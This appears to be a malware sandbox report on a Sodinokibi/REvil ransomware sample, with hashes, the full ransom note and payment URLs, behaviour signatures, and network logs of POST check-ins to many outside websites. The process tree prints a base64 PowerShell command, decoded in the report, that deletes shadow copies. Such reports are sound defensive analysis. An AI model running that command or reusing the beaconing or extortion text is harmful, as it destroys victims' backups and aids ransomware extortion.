Analysis

  • max time kernel
    137s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20231215-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02/04/2024, 13:53 UTC

General

  • Target

    42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe

  • Size

    166KB

  • MD5

    43e9093ffc8dd69985a9ae65b26f5551

  • SHA1

    7b268ff84e824ddcd8b7df3cf9993be012489d01

  • SHA256

    42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d

  • SHA512

    118d879750d0456f5b2e31818815ef9465fb40eac24f4784236c626d2a2e753b5a85ec5b2c66a755b10855c9caaf77bd85b6b3d1fc7003fb029cb703ead9037c

  • SSDEEP

    3072:1LFrb30BRtBZZg+i2ayy2RjLTuVyu7CJDgoMT3QG9BEJfMt0H:ZJ0BXScFy2RsQJ8zgG9jt0

Malware Config

Extracted

Path

C:\Recovery\wpq2m-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension wpq2m.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
  a) Download and install TOR browser from this site: https://torproject.org/
  b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/884E796F59D57ABB

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
  a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
  b) Open our secondary website: http://decryptor.cc/884E796F59D57ABB

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:
Key:

2dpDZ78zX2b2dvXF5iWHoEvyOESk/bXR0+DRWfyYP9sTjfX7lLz8rH7blNuZ6mXv
vH6FmLTxOMLggPOCcqNqfOGqLw1f+4S7PnDTOjq1a7rNXPjteyeX9QWuXuB2f5vA
C+NUE3fpL6CM/x5aqVl0MXFHRQpiPUxQp5cioCcqoJy5PqU8rusNkBTggoAmSsKT
TYAUduGYSpd9c9pHJTuMkmYnAenMkloYZw5SRAqg4vrdlc26/CTXEmBcYcWr+ZVF
sYJCByfYKdzRqqk4X078F/XHaOFTn1MaDO3ScMBmj+RvP7maOZRtbjPOeXOdxpWg
zfI5mZA54ncUVNzGrDXiinC4n4PgVsUPdgJUoZHvnZEGi5oUajoR7tIAxI7a+N8V
Fzg+c3EywiANv4Mcq3MBlEhxe97AWq6CacwYzgJSBhFiNbHKMLNfRImihG2mbumV
VzsTzYSiw3NBtSNfkt6H8reCduE05B++vS1Erjh/LAPEofN6qURU/Dt7XZiaTCrX
ETvkotiJAGGoGW/jHjnPa/ePR6jqXKJjMYVcN7i/mhqgYz2aRv2eG8wDbZ7rVrsX
qrlj/0/xqXx+QAU6CqNPN5TvokTMyrtcJtO7uQ/Qu+XR4CsJKXc/+Az+f5QmUB1K
RqcLIHddDzUPryWrvxMo0JSiYhH3ibUHijcfX8P9uNB41YU18TVuhaHwSXV31vKB
ET8A4YdKQ/6VwCmRaklnSgjuiBEl2eWDEIUV/ZuOIlMZrC2lN6hapy1e63VV+mQW
PRD9qK8lVFVS1N/zSg7PjLAjHpFbe5CG9GAHHaePMoyrI/VDsZI3JaOnmKwPRiIG
pp3O+aO4BO8I5LqbGAgCeP/WNtqBFVopjwab6De9ihlpsRnn2rGEfZq7Dld+4bGB
skm+3dTn8yev3l8RRQeBDBKWXExXJV9g4PnvzhKVP0pduIusmqUz4QfaFQSlorkK
TAFK3IIRi0WW6qvfd9CylS6fJJsFAHXKVBI4V6/66Trv7tEYlmgcUAtbdpP9ZnXg
I5mcfzvHD7lj8GzTgC9HiYCakai5CPLXH6uNMd+c4/CvJt4NJMMJKj6KpoGwQtWh
1KpTt02NY/q43PKu9nyOyHWncxeMMnU7Ubk4cTxJEo7XtNyLNaxqAg3LRYtwqHVA
eUm2JEexb0z4/3WiEgUKnPNdvS3+10ii9IQqS+cdJvXHX8M2NzHYJb51iTDGP8zH
ctddrsTd+IyXjKzr0xTCRA==

-----------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/884E796F59D57ABB

http://decryptor.cc/884E796F59D57ABB

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  • Drops file in Program Files directory (26 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (2 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
    "C:\Users\Admin\AppData\Local\Temp\42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe"
    PID:2472
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of PID 2472)
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} , i.e. the shadow-copy deletion that the "Uses Volume Shadow Copy service COM API" signature and the vssvc.exe start below correspond to)
      PID:4824
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    PID:1076
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    PID:220
    • Suspicious use of AdjustPrivilegeToken

Network

    • flag-us
      DNS
      183.142.211.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.142.211.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      218.135.221.88.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      218.135.221.88.in-addr.arpa
      IN PTR
      Response
      218.135.221.88.in-addr.arpa
      IN PTR
      a88-221-135-218.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      5.181.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      5.181.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      104.219.191.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      104.219.191.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      81.171.91.138.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      81.171.91.138.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      86.23.85.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      86.23.85.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      18.31.95.13.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      18.31.95.13.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      35.34.16.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      35.34.16.2.in-addr.arpa
      IN PTR
      Response
      35.34.16.2.in-addr.arpa
      IN PTR
      a2-16-34-35.deploy.static.akamaitechnologies.com
    • flag-us
      DNS
      mank.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      mank.de
      IN A
      Response
      mank.de
      IN A
      176.52.247.15
    • flag-de
      POST
      https://mank.de/static/images/ueijdxnirivp.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      176.52.247.15:443
      Request
      POST /static/images/ueijdxnirivp.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: mank.de
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Tue, 02 Apr 2024 13:54:49 GMT
      Server: Apache
      X-Redirect-By: WordPress
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Location: https://www.mank.de/static/images/ueijdxnirivp.gif
      Cache-Control: max-age=3600
      Expires: Tue, 02 Apr 2024 14:54:49 GMT
      Referrer-Policy: no-referrer-when-downgrade
      Content-Length: 0
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      www.mank.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.mank.de
      IN A
      Response
      www.mank.de
      IN CNAME
      mank.de
      mank.de
      IN A
      176.52.247.15
    • flag-de
      GET
      https://www.mank.de/static/images/ueijdxnirivp.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      176.52.247.15:443
      Request
      GET /static/images/ueijdxnirivp.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.mank.de
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 13:54:50 GMT
      Server: Apache
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.mank.de/wp-json/>; rel="https://api.w.org/"
      Upgrade: h2,h2c
      Connection: Upgrade, close
      Referrer-Policy: no-referrer-when-downgrade
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      15.247.52.176.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.247.52.176.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      work2live.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      work2live.de
      IN A
      Response
      work2live.de
      IN A
      217.160.0.10
    • flag-de
      POST
      https://work2live.de/uploads/pictures/ta.png
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      217.160.0.10:443
      Request
      POST /uploads/pictures/ta.png HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: work2live.de
    • flag-us
      DNS
      10.0.160.217.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      10.0.160.217.in-addr.arpa
      IN PTR
      Response
      10.0.160.217.in-addr.arpa
      IN PTR
      217-160-0-10.elastic-ssl.ui-r.com
    • flag-us
      DNS
      240.221.184.93.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      240.221.184.93.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      triggi.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      triggi.de
      IN A
      Response
      triggi.de
      IN A
      159.69.83.114
    • flag-de
      POST
      https://triggi.de/news/image/pmltlc.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      159.69.83.114:443
      Request
      POST /news/image/pmltlc.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: triggi.de
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:55:27 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Disabled-plugins: 0 on 2024-04-02 01:55:27
      Strict-Transport-Security: max-age=63072000
    • flag-us
      DNS
      innote.fi
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      innote.fi
      IN A
      Response
      innote.fi
      IN A
      18.197.248.23
      innote.fi
      IN A
      52.59.120.70
    • flag-de
      POST
      https://innote.fi/uploads/image/ht.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      18.197.248.23:443
      Request
      POST /uploads/image/ht.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: innote.fi
      Response
      HTTP/1.1 403 Forbidden
      server: nginx
      date: Tue, 02 Apr 2024 13:55:27 GMT
      content-type: image/jpeg
      content-length: 125
      connection: close
    • flag-us
      DNS
      iwelt.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      iwelt.de
      IN A
      Response
      iwelt.de
      IN A
      82.212.215.131
    • flag-de
      POST
      https://iwelt.de/news/assets/ksry.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      82.212.215.131:443
      Request
      POST /news/assets/ksry.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: iwelt.de
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Tue, 02 Apr 2024 13:55:28 GMT
      Server: Apache
      Location: https://www.iwelt.de/news/assets/ksry.jpg
      Content-Length: 308
      Connection: close
      Content-Type: text/html; charset=iso-8859-1
    • flag-us
      DNS
      www.iwelt.de
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.iwelt.de
      IN A
      Response
      www.iwelt.de
      IN A
      82.212.215.131
    • flag-de
      GET
      https://www.iwelt.de/news/assets/ksry.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      82.212.215.131:443
      Request
      GET /news/assets/ksry.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.iwelt.de
      Response
      HTTP/1.1 200 OK
      Date: Tue, 02 Apr 2024 13:55:28 GMT
      Server: Apache
      Strict-Transport-Security: max-age=31536000
      X-Frame-Options: SAMEORIGIN
      Upgrade: h2
      Connection: Upgrade, close
      Cache-Control: max-age=3600
      Expires: Tue, 02 Apr 2024 14:55:28 GMT
      Vary: Accept-Encoding
      X-XSS-Protection: 1; mode=block
      X-Content-Type-Options: nosniff
      Referrer-Policy:
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      114.83.69.159.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      114.83.69.159.in-addr.arpa
      IN PTR
      Response
      114.83.69.159.in-addr.arpa
      IN PTR
      b97233d.myraidbox.de
    • flag-us
      DNS
      23.248.197.18.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      23.248.197.18.in-addr.arpa
      IN PTR
      Response
      23.248.197.18.in-addr.arpa
      IN PTR
      eu-staticipmultiscreensitecom
    • flag-us
      DNS
      131.215.212.82.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      131.215.212.82.in-addr.arpa
      IN PTR
      Response
      131.215.212.82.in-addr.arpa
      IN PTR
      sni-web02isitede
    • flag-us
      DNS
      mdacares.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      mdacares.com
      IN A
      Response
      mdacares.com
      IN A
      74.220.199.6
    • flag-us
      DNS
      celularity.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      celularity.com
      IN A
      Response
      celularity.com
      IN A
      141.193.213.10
      celularity.com
      IN A
      141.193.213.11
    • flag-us
      POST
      https://celularity.com/uploads/graphic/xqkkog.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      141.193.213.10:443
      Request
      POST /uploads/graphic/xqkkog.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: celularity.com
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 13:55:32 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: close
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      Vary: Accept-Encoding
      CF-Cache-Status: DYNAMIC
      Set-Cookie: __cf_bm=1KXTdBsVEzbqVBY6lm1A89nW90fKVP1377b9.gvUChU-1712066132-1.0.1.1-8D89HZWbbXEyhUN1YrKFkdcsz5P.uA2FSuF5R02reM7Teki0NecFuSqGaVjyGhizGM1PRI_jcZQSNTGA4E4LNw; path=/; expires=Tue, 02-Apr-24 14:25:32 GMT; domain=.celularity.com; HttpOnly; Secure
      Server: cloudflare
      CF-RAY: 86e1512b58766518-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      wychowanieprzedszkolne.pl
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      wychowanieprzedszkolne.pl
      IN A
      Response
      wychowanieprzedszkolne.pl
      IN A
      185.38.248.97
    • flag-pl
      POST
      https://wychowanieprzedszkolne.pl/data/images/utbnsp.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      185.38.248.97:443
      Request
      POST /data/images/utbnsp.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: wychowanieprzedszkolne.pl
      Response
      HTTP/1.1 404 Not found
      Date: Tue, 02 Apr 2024 13:55:32 GMT
      Server: Apache
      X-Frame-Options: SAMEORIGIN
      Upgrade: h2,h2c
      Connection: keep-alive, close
      Vary: Accept-Encoding,User-Agent
      X-XSS-Protection: 1; mode=block
      X-Content-Type-Options: nosniff
      Transfer-Encoding: chunked
      Content-Type: text/html; charset=UTF-8
    • flag-us
      DNS
      bildungsunderlebnis.haus
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      bildungsunderlebnis.haus
      IN A
      Response
      bildungsunderlebnis.haus
      IN A
      5.35.226.24
    • flag-de
      POST
      https://bildungsunderlebnis.haus/include/tmp/rguxep.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      5.35.226.24:443
      Request
      POST /include/tmp/rguxep.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: bildungsunderlebnis.haus
      Response
      HTTP/1.1 404 Not Found
      Date: Tue, 02 Apr 2024 13:55:33 GMT
      Content-Type: text/html; charset=utf-8
      Transfer-Encoding: chunked
      Connection: close
      Server: Apache
      Vary: accept-language,accept-charset
      Accept-Ranges: bytes
      Content-Language: en
      Expires: Tue, 02 Apr 2024 13:55:33 GMT
    • flag-us
      DNS
      10.213.193.141.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      10.213.193.141.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      urmasiimariiuniri.ro
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      urmasiimariiuniri.ro
      IN A
      Response
      urmasiimariiuniri.ro
      IN A
      81.181.102.24
    • flag-us
      DNS
      urmasiimariiuniri.ro
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      urmasiimariiuniri.ro
      IN A
      Response
      urmasiimariiuniri.ro
      IN A
      81.181.102.24
    • flag-us
      DNS
      97.248.38.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.248.38.185.in-addr.arpa
      IN PTR
      Response
      97.248.38.185.in-addr.arpa
      IN PTR
      bogdan.hostinghouse.pl
    • flag-us
      DNS
      97.248.38.185.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      97.248.38.185.in-addr.arpa
      IN PTR
      Response
      97.248.38.185.in-addr.arpa
      IN PTR
      bogdan.hostinghouse.pl
    • flag-us
      DNS
      23.236.111.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      23.236.111.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      24.226.35.5.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      24.226.35.5.in-addr.arpa
      IN PTR
      Response
      24.226.35.5.in-addr.arpa
      IN PTR
      wp255.webpack.hosteurope.de
    • flag-us
      DNS
      devlaur.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      devlaur.com
      IN A
      Response
      devlaur.com
      IN A
      3.33.130.190
      devlaur.com
      IN A
      15.197.148.33
    • flag-us
      POST
      https://devlaur.com/data/pics/or.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      3.33.130.190:443
      Request
      POST /data/pics/or.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: devlaur.com
      Response
      HTTP/1.1 405 Method Not Allowed
      Date: Tue, 02 Apr 2024 13:55:55 GMT
      Content-Length: 0
      Connection: close
    • flag-us
      DNS
      philippedebroca.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      philippedebroca.com
      IN A
      Response
      philippedebroca.com
      IN A
      212.83.139.44
    • flag-fr
      POST
      https://philippedebroca.com/admin/image/ppwfmo.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      212.83.139.44:443
      Request
      POST /admin/image/ppwfmo.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: philippedebroca.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Tue, 02 Apr 2024 13:55:55 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: close
      Location: https://www.philippedebroca.fr/admin/image/ppwfmo.jpg
    • flag-us
      DNS
      190.130.33.3.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      190.130.33.3.in-addr.arpa
      IN PTR
      Response
      190.130.33.3.in-addr.arpa
      IN PTR
      a2aa9ff50de748dbe.awsglobalaccelerator.com
    • flag-us
      DNS
      www.philippedebroca.fr
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      www.philippedebroca.fr
      IN A
      Response
      www.philippedebroca.fr
      IN CNAME
      philippedebroca.fr
      philippedebroca.fr
      IN A
      212.83.139.44
    • flag-fr
      GET
      https://www.philippedebroca.fr/admin/image/ppwfmo.jpg
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      212.83.139.44:443
      Request
      GET /admin/image/ppwfmo.jpg HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Host: www.philippedebroca.fr
      Response
      HTTP/1.1 404 Not Found
      Server: nginx
      Date: Tue, 02 Apr 2024 13:55:57 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: close
      X-Powered-By: PHP/8.1.27
      Expires: Wed, 11 Jan 1984 05:00:00 GMT
      Cache-Control: no-cache, must-revalidate, max-age=0
      Link: <https://www.philippedebroca.fr/wp-json/>; rel="https://api.w.org/"
      Strict-Transport-Security: max-age=15768000; includeSubDomains
    • flag-us
      DNS
      44.139.83.212.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      44.139.83.212.in-addr.arpa
      IN PTR
      Response
      44.139.83.212.in-addr.arpa
      IN PTR
      212-83-139-44.rev.poneytelecom.eu
    • flag-us
      DNS
      kaminscy.com
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      8.8.8.8:53
      Request
      kaminscy.com
      IN A
      Response
      kaminscy.com
      IN A
      51.75.34.224
    • flag-pl
      POST
      https://kaminscy.com/uploads/images/xvrcakvaetjk.gif
      42c28feb23c992a350673d63413bf11bc816d00a079462ab524934219d46430d.exe
      Remote address:
      51.75.34.224:443
      Request
      POST /uploads/images/xvrcakvaetjk.gif HTTP/1.1
      Cache-Control: no-cache
      Connection: close
      Pragma: no-cache
      Content-Type: application/octet-stream
      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
      Content-Length: 928
      Host: kaminscy.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Tue, 02 Apr 2024 13:55:57 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: close
      Location: https://www.kaminscy.com/uploads/images/xvrcakvaetjk.gif
      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
      X-Xss-Protection: 1; mode=block
      X-Frame-Options: SAMEORIGIN
      X-Content-Type-Options: nosniff
      Content-Security-Policy: default-src 'self' https://bam.nr-data.net https://c.disquscdn.com https://disqus.com http://nominatim.openstreetmap.org https://googleads.g.doubleclick.net https://*.google-analytics.com/ https://widgets.wp.com/ https://api-iam.intercom.io/ wss://nexus-websocket-a.intercom.io/ https://my.yoast.com/ https://*.cloudfront.net ; script-src 'self' 'unsafe-inline' 'unsafe-eval' blob: https://js-agent.newrelic.com https://bam.nr-data.net https://*.addthis.com https://ssl.google-analytics.com/ga.js https://pagead2.googlesyndication.com https://static.doubleclick.net/instream/ad_status.js https://adservice.google.pl/adsid/integrator.js https://adservice.google.com/adsid/integrator.js https://ajax.googleapis.com https://a.disquscdn.com https://disqus.com https://*.disqus.com https://js-agent.newrelic.com https://*.static.am5.pl https://static.am5.pl https://connect.facebook.net https://*.wp.com https://secure.gravatar.com https://widgets.twimg.com/j/2/widget.js https://www.googletagmanager.com 